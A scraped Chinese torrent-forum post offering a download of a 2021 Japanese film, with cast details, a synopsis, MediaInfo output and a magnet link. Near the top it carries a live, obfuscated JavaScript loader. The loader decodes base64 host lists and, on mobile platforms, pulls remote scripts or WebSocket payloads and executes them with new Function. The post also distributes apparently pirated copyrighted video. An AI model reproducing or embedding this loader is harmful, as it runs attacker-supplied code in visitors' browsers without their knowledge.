破碎的瞬间[简繁字幕].My.Blood&Bones.in.a.flowing.Galaxy.2021.1080p.NF.WEB-DL.DDP5.1.x264 4.39GB

版主小s 1月前 668

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 破碎的瞬间
◎片  名 砕け散るところを見せてあげる
◎年  代 2021
◎产  地 日本
◎类  别 剧情
◎语  言 日语
◎上映日期 2021-04-09(日本)
◎IMDb链接 https://www.imdb.com/title/tt11840954/
◎豆瓣评分 6.0/10 (146人评价)
◎豆瓣链接 https://movie.douban.com/subject/34969830/
◎片  长 128分钟
◎导  演 萨布 SABU (id:1041685)
◎演  员 中川大志 Taishi Nakagawa (id:1316389)
       石井杏奈 Ishii Anna (id:1331385)
       井之胁海 Kai Inowaki (id:1312156)
       清原果耶 Kaya Kiyohara (id:1350196)
       原田知世 Tomoyo Harada (id:1038902)
       堤真一 Shin'ichi Tsutsumi (id:1151079)
       堤真佐子 Masako Tsutsumi (id:1338877)
       木野花 Hana Kino (id:1015520)
       矢田亚希子 Akiko Yada (id:1015297)
       北村匠海 Takumi Kitamura (id:1314521)
       松井爱莉 Airi Matsui (id:1333903)
       犬饲直纪 Naoki Inukai (id:1451856)

◎标  签 日本 / 日本电影 / 中川大志 / 青春 / 2021 / 萨布 / 清原果耶 / 电影

◎简  介
  故事讲述正义感强的高三学生滨田清澄(中川大志 饰),试图拯救受到欺凌的高一学生藏本玻璃(石井杏奈 饰),两个人之间的距离也逐渐缩小。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 221770258268276416109768369228822888847 (0xA6D765EB048C094E240112B319E8418F)

  4. Complete name                            : My.Blood&B[email protected]BBQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 4.39 GiB

  8. Duration                                 : 2 h 7 min

  9. Overall bit rate mode                    : Variable

  10. Overall bit rate                         : 4 922 kb/s

  11. Encoded date                             : UTC 2021-08-09 11:48:02

  12. Writing application                      : mkvmerge v56.1.0 ('My Friend') 64-bit

  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID                                       : 1

  16. Format                                   : AVC

  17. Format/Info                              : Advanced Video Codec

  18. Format profile                           : [email protected]

  19. Format settings                          : CABAC / 4 Ref Frames

  20. Format settings, CABAC                   : Yes

  21. Format settings, Reference frames        : 4 frames

  22. Codec ID                                 : V_MPEG4/ISO/AVC

  23. Duration                                 : 2 h 7 min

  24. Bit rate mode                            : Variable

  25. Bit rate                                 : 4 281 kb/s

  26. Maximum bit rate                         : 20.0 Mb/s

  27. Width                                    : 1 920 pixels

  28. Height                                   : 1 080 pixels

  29. Display aspect ratio                     : 16:9

  30. Frame rate mode                          : Constant

  31. Frame rate                               : 23.976 (24000/1001/53354) FPS

  32. Color space                              : YUV

  33. Chroma subsampling                       : 4:2:0

  34. Bit depth                                : 8 bits

  35. Scan type                                : Progressive

  36. Bits/(Pixel*Frame)                       : 0.086

  37. Stream size                              : 3.81 GiB (87%)

  38. Writing library                          : x264 core 148 r2722 1b0121b

  39. Encoding settings                        : cabac=1 / ref=4 / deblock=1:0:0 / analyse=0x3:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=120 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=2 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=16 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=121 / scenecut=0 / intra_refresh=0 / rc_lookahead=240 / rc=crf / mbtree=1 / crf=16.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / vbv_maxrate=20000 / vbv_bufsize=25000 / crf_max=0.0 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:0.80

  40. Default                                  : Yes

  41. Forced                                   : No


  42. Audio

  43. ID                                       : 2

  44. Format                                   : E-AC-3

  45. Format/Info                              : Enhanced AC-3

  46. Commercial name                          : Dolby Digital Plus

  47. Codec ID                                 : A_EAC3

  48. Duration                                 : 2 h 7 min

  49. Bit rate mode                            : Constant

  50. Bit rate                                 : 640 kb/s

  51. Channel(s)                               : 6 channels

  52. Channel layout                           : L R C LFE Ls Rs

  53. Sampling rate                            : 48.0 kHz

  54. Frame rate                               : 31.250 FPS (1536 SPF)

  55. Compression mode                         : Lossy

  56. Stream size                              : 584 MiB (13%)

  57. Language                                 : Japanese

  58. Service kind                             : Complete Main

  59. Default                                  : Yes

  60. Forced                                   : No


  61. Text #1

  62. ID                                       : 3

  63. Format                                   : UTF-8

  64. Codec ID                                 : S_TEXT/UTF8

  65. Codec ID/Info                            : UTF-8 Plain Text

  66. Duration                                 : 2 h 7 min

  67. Bit rate                                 : 37 b/s

  68. Count of elements                        : 1263

  69. Stream size                              : 34.5 KiB (0%)

  70. Title                                    : 简体中文

  71. Language                                 : Chinese

  72. Default                                  : Yes

  73. Forced                                   : No


  74. Text #2

  75. ID                                       : 4

  76. Format                                   : UTF-8

  77. Codec ID                                 : S_TEXT/UTF8

  78. Codec ID/Info                            : UTF-8 Plain Text

  79. Duration                                 : 2 h 7 min

  80. Bit rate                                 : 36 b/s

  81. Count of elements                        : 1263

  82. Stream size                              : 34.2 KiB (0%)

  83. Title                                    : 繁体中文

  84. Language                                 : Chinese

  85. Default                                  : No

  86. Forced                                   : No



TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:79B9079BDAB844B5CEFF591512184BE8B53445A4
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回